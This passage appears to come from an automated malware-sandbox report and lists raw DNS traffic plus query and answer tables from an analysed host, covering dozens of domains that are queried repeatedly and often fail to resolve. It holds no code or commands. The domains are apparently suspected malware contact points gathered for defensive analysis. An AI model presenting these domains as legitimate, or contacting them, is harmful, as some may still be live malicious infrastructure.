                                                                                                                        Nov 25, 2021 12:57:05.759927034 CET53610271.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:11.326653957 CET5155453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:11.527509928 CET53515541.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:16.543878078 CET5345253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:17.559029102 CET5345253192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:57:17.784806013 CET53534521.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:17.785197973 CET5345253192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:57:19.576499939 CET53534529.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:19.580840111 CET53534529.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:24.589252949 CET6508753192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:24.603919029 CET53650871.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:38.210880041 CET5619453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:38.233838081 CET53561941.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:43.272383928 CET5364153192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:43.309425116 CET53536411.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:48.318795919 CET6384653192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:48.430073023 CET53638461.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.002094984 CET5657553192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:04.223543882 CET53565751.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:09.580043077 CET5715453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:09.592269897 CET53571541.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:14.609978914 CET6515053192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:14.773039103 CET53651501.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:19.779851913 CET5051253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:19.811454058 CET53505121.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:29.855937958 CET5434653192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:30.458825111 CET53543461.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:30.459197998 CET5434653192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:58:30.588610888 CET53543469.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:35.605232954 CET5002253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:35.633763075 CET53500221.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:46.211113930 CET6449653192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:46.429765940 CET6449653192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:58:46.431617975 CET53644961.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:46.492364883 CET53644969.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:51.444456100 CET6312553192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:51.662826061 CET6312553192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:58:52.678152084 CET6312553192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:52.685652018 CET53631251.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:52.686074972 CET6312553192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:58:52.688004971 CET53631251.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:52.688359022 CET6312553192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:58:53.021514893 CET53631259.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:54.459963083 CET53631259.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:54.460007906 CET53631259.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:58.036858082 CET6427853192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:58:58.051316977 CET53642781.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:10.721602917 CET6031353192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:59:10.939840078 CET6031353192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:59:10.964309931 CET53603131.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:11.009278059 CET53603139.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:15.971111059 CET6171953192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:59:16.058739901 CET53617191.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:21.063400030 CET5537253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:59:21.081434011 CET53553721.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.108608961 CET6466853192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:59:26.327131987 CET6466853192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:59:26.439765930 CET53646681.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.513344049 CET53646689.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:31.654335022 CET6532053192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:59:31.680389881 CET53653201.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:56.101802111 CET5005953192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:59:56.131233931 CET53500591.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:01.211821079 CET5800553192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:00:01.233881950 CET53580051.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:06.240541935 CET6007753192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:00:06.458643913 CET6007753192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:00:06.735636950 CET53600779.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:06.831073046 CET53600771.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:29.942055941 CET5308953192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:00:30.156375885 CET5308953192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:00:30.477859974 CET53530899.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:30.897559881 CET53530891.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:53.886012077 CET5471653192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:00:53.921145916 CET53547161.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:03.977972984 CET5292553192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:04.101047993 CET53529251.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:04.101392984 CET5292553192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:01:05.101810932 CET5292553192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:01:05.443922043 CET53529259.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:05.901644945 CET53529259.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:10.460341930 CET5196153192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:10.623939991 CET53519611.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:21.473484039 CET5568853192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:21.523458958 CET53556881.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:26.535120964 CET5577253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:26.753305912 CET5577253192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:01:27.768533945 CET5577253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:28.100953102 CET53557721.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:28.101001024 CET53557721.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:28.101371050 CET5577253192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:01:28.101464033 CET5577253192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 13:01:28.143435001 CET53557729.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:29.227781057 CET53557729.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:29.390598059 CET53557729.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.158452988 CET6309453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:33.178805113 CET53630941.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:48.514272928 CET5951853192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:48.535561085 CET53595181.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:53.544626951 CET4971053192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 13:01:53.565690994 CET53497101.1.1.1192.168.11.20

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Nov 25, 2021 12:54:53.733247995 CET192.168.11.201.1.1.10x4274Standard query (0)atseasonals.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:50.986593008 CET192.168.11.201.1.1.10x5671Standard query (0)www.tvterradafarinha.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:56.046475887 CET192.168.11.201.1.1.10xbd52Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:57.061180115 CET192.168.11.209.9.9.90xbd52Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:58.076499939 CET192.168.11.201.1.1.10xbd52Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:58.974685907 CET192.168.11.209.9.9.90xbd52Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:58.974780083 CET192.168.11.209.9.9.90xbd52Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:07.997185946 CET192.168.11.201.1.1.10xf541Standard query (0)www.testwebsite0711.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:13.027062893 CET192.168.11.201.1.1.10xe8e0Standard query (0)www.topwowshopping.storeA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:28.414575100 CET192.168.11.201.1.1.10x5fbStandard query (0)www.growebox.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:33.584800005 CET192.168.11.201.1.1.10xb6f5Standard query (0)www.ayudavida.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:39.584042072 CET192.168.11.201.1.1.10x1a58Standard query (0)www.stylesbykee.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:45.129364967 CET192.168.11.201.1.1.10xcf10Standard query (0)www.wordpresshostingblog.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:50.159405947 CET192.168.11.201.1.1.10x48a0Standard query (0)www.inklusion.onlineA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:55.205044031 CET192.168.11.201.1.1.10x36cdStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:55.394615889 CET192.168.11.209.9.9.90x36cdStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:00.688455105 CET192.168.11.201.1.1.10xf76dStandard query (0)www.aubzo7o9fm.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:05.718594074 CET192.168.11.201.1.1.10x2175Standard query (0)www.mackthetruck.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:11.326653957 CET192.168.11.201.1.1.10x4f7aStandard query (0)www.koedayuuki.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:16.543878078 CET192.168.11.201.1.1.10xc21eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:17.559029102 CET192.168.11.209.9.9.90xc21eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:17.785197973 CET192.168.11.209.9.9.90xc21eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:24.589252949 CET192.168.11.201.1.1.10xed1bStandard query (0)www.diamota.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:38.210880041 CET192.168.11.201.1.1.10x1ebcStandard query (0)www.helpcloud.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:43.272383928 CET192.168.11.201.1.1.10x2ba0Standard query (0)www.learncodeing.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:48.318795919 CET192.168.11.201.1.1.10xb654Standard query (0)www.ozattaos.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:04.002094984 CET192.168.11.201.1.1.10xb240Standard query (0)www.unitedmetal-saudi.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:09.580043077 CET192.168.11.201.1.1.10xac5eStandard query (0)www.photon4energy.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:14.609978914 CET192.168.11.201.1.1.10x29d3Standard query (0)www.diamota.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:19.779851913 CET192.168.11.201.1.1.10x8579Standard query (0)www.wordpresshostingblog.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:29.855937958 CET192.168.11.201.1.1.10x6a1bStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:30.459197998 CET192.168.11.209.9.9.90x6a1bStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:35.605232954 CET192.168.11.201.1.1.10x2b4dStandard query (0)www.aubzo7o9fm.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:46.211113930 CET192.168.11.201.1.1.10x93f5Standard query (0)www.koedayuuki.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:46.429765940 CET192.168.11.209.9.9.90x93f5Standard query (0)www.koedayuuki.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:51.444456100 CET192.168.11.201.1.1.10x8f42Standard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:51.662826061 CET192.168.11.209.9.9.90x8f42Standard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:52.678152084 CET192.168.11.201.1.1.10x8f42Standard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:52.686074972 CET192.168.11.209.9.9.90x8f42Standard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:52.688359022 CET192.168.11.209.9.9.90x8f42Standard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:58.036858082 CET192.168.11.201.1.1.10x614bStandard query (0)www.diamota.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:10.721602917 CET192.168.11.201.1.1.10x390aStandard query (0)www.recoverytrivia.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:10.939840078 CET192.168.11.209.9.9.90x390aStandard query (0)www.recoverytrivia.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:15.971111059 CET192.168.11.201.1.1.10x3831Standard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:21.063400030 CET192.168.11.201.1.1.10xb4edStandard query (0)www.divorcefearfreedom.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.108608961 CET192.168.11.201.1.1.10xa37aStandard query (0)www.jamiecongedo.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.327131987 CET192.168.11.209.9.9.90xa37aStandard query (0)www.jamiecongedo.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:31.654335022 CET192.168.11.201.1.1.10x18efStandard query (0)www.lopsrental.leaseA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:56.101802111 CET192.168.11.201.1.1.10x4871Standard query (0)www.wordpresshostingblog.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:01.211821079 CET192.168.11.201.1.1.10x50ecStandard query (0)www.photon4energy.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:06.240541935 CET192.168.11.201.1.1.10xa2dbStandard query (0)www.hsbp.onlineA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:06.458643913 CET192.168.11.209.9.9.90xa2dbStandard query (0)www.hsbp.onlineA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:29.942055941 CET192.168.11.201.1.1.10x4dabStandard query (0)www.hsbp.onlineA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:30.156375885 CET192.168.11.209.9.9.90x4dabStandard query (0)www.hsbp.onlineA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:53.886012077 CET192.168.11.201.1.1.10x7c85Standard query (0)www.wordpresshostingblog.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:03.977972984 CET192.168.11.201.1.1.10x56ebStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:04.101392984 CET192.168.11.209.9.9.90x56ebStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:05.101810932 CET192.168.11.209.9.9.90x56ebStandard query (0)www.braxtynmi.xyzA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:10.460341930 CET192.168.11.201.1.1.10x9efeStandard query (0)www.aubzo7o9fm.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:21.473484039 CET192.168.11.201.1.1.10xc796Standard query (0)www.koedayuuki.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:26.535120964 CET192.168.11.201.1.1.10xf45eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:26.753305912 CET192.168.11.209.9.9.90xf45eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:27.768533945 CET192.168.11.201.1.1.10xf45eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:28.101371050 CET192.168.11.209.9.9.90xf45eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:28.101464033 CET192.168.11.209.9.9.90xf45eStandard query (0)www.abcjanitorialsolutions.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:33.158452988 CET192.168.11.201.1.1.10x7e4dStandard query (0)www.diamota.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:48.514272928 CET192.168.11.201.1.1.10x6e31Standard query (0)www.diamota.comA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:53.544626951 CET192.168.11.201.1.1.10x6a85Standard query (0)www.littlefishth.comA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Nov 25, 2021 12:54:53.942935944 CET1.1.1.1192.168.11.200x4274No error (0)atseasonals.com107.6.148.162A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:51.042181015 CET1.1.1.1192.168.11.200x5671Name error (3)www.tvterradafarinha.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:58.974168062 CET1.1.1.1192.168.11.200xbd52Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:55:58.974231958 CET1.1.1.1192.168.11.200xbd52Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:08.015940905 CET1.1.1.1192.168.11.200xf541Name error (3)www.testwebsite0711.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:13.209991932 CET1.1.1.1192.168.11.200xe8e0No error (0)www.topwowshopping.store104.21.76.223A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:13.209991932 CET1.1.1.1192.168.11.200xe8e0No error (0)www.topwowshopping.store172.67.201.232A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:28.519181967 CET1.1.1.1192.168.11.200x5fbNo error (0)www.growebox.comgrowebox.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:28.519181967 CET1.1.1.1192.168.11.200x5fbNo error (0)growebox.com81.2.194.128A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:33.892754078 CET1.1.1.1192.168.11.200xb6f5No error (0)www.ayudavida.com164.155.212.139A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:39.787123919 CET1.1.1.1192.168.11.200x1a58No error (0)www.stylesbykee.com172.120.157.187A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:45.150636911 CET1.1.1.1192.168.11.200xcf10Name error (3)www.wordpresshostingblog.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:50.179316044 CET1.1.1.1192.168.11.200x48a0No error (0)www.inklusion.online3.64.163.50A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:55.394290924 CET1.1.1.1192.168.11.200x36cdServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:56:55.683530092 CET9.9.9.9192.168.11.200x36cdServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:00.714526892 CET1.1.1.1192.168.11.200xf76dName error (3)www.aubzo7o9fm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:05.759927034 CET1.1.1.1192.168.11.200x2175No error (0)www.mackthetruck.com203.170.80.250A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:11.527509928 CET1.1.1.1192.168.11.200x4f7aName error (3)www.koedayuuki.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:17.784806013 CET1.1.1.1192.168.11.200xc21eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:19.576499939 CET9.9.9.9192.168.11.200xc21eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:19.580840111 CET9.9.9.9192.168.11.200xc21eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:24.603919029 CET1.1.1.1192.168.11.200xed1bName error (3)www.diamota.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:38.233838081 CET1.1.1.1192.168.11.200x1ebcNo error (0)www.helpcloud.xyz88.99.22.5A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:43.309425116 CET1.1.1.1192.168.11.200x2ba0Name error (3)www.learncodeing.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:48.430073023 CET1.1.1.1192.168.11.200xb654No error (0)www.ozattaos.xyz172.67.164.153A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:57:48.430073023 CET1.1.1.1192.168.11.200xb654No error (0)www.ozattaos.xyz104.21.82.227A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:04.223543882 CET1.1.1.1192.168.11.200xb240No error (0)www.unitedmetal-saudi.comzhs.zohosites.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:04.223543882 CET1.1.1.1192.168.11.200xb240No error (0)zhs.zohosites.com136.143.191.204A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:09.592269897 CET1.1.1.1192.168.11.200xac5eName error (3)www.photon4energy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:14.773039103 CET1.1.1.1192.168.11.200x29d3Name error (3)www.diamota.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:19.811454058 CET1.1.1.1192.168.11.200x8579Name error (3)www.wordpresshostingblog.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:30.458825111 CET1.1.1.1192.168.11.200x6a1bServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:30.588610888 CET9.9.9.9192.168.11.200x6a1bServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:35.633763075 CET1.1.1.1192.168.11.200x2b4dName error (3)www.aubzo7o9fm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:46.431617975 CET1.1.1.1192.168.11.200x93f5Name error (3)www.koedayuuki.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:46.492364883 CET9.9.9.9192.168.11.200x93f5Name error (3)www.koedayuuki.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:52.685652018 CET1.1.1.1192.168.11.200x8f42Server failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:52.688004971 CET1.1.1.1192.168.11.200x8f42Server failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:53.021514893 CET9.9.9.9192.168.11.200x8f42Server failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:54.459963083 CET9.9.9.9192.168.11.200x8f42Server failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:54.460007906 CET9.9.9.9192.168.11.200x8f42Server failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:58:58.051316977 CET1.1.1.1192.168.11.200x614bName error (3)www.diamota.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:10.964309931 CET1.1.1.1192.168.11.200x390aName error (3)www.recoverytrivia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:11.009278059 CET9.9.9.9192.168.11.200x390aName error (3)www.recoverytrivia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:16.058739901 CET1.1.1.1192.168.11.200x3831Name error (3)www.recruitresumelibrary.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:21.081434011 CET1.1.1.1192.168.11.200xb4edNo error (0)www.divorcefearfreedom.comdivorcefearfreedom.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:21.081434011 CET1.1.1.1192.168.11.200xb4edNo error (0)divorcefearfreedom.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:21.081434011 CET1.1.1.1192.168.11.200xb4edNo error (0)divorcefearfreedom.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.439765930 CET1.1.1.1192.168.11.200xa37aNo error (0)www.jamiecongedo.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.439765930 CET1.1.1.1192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.439765930 CET1.1.1.1192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.439765930 CET1.1.1.1192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.439765930 CET1.1.1.1192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
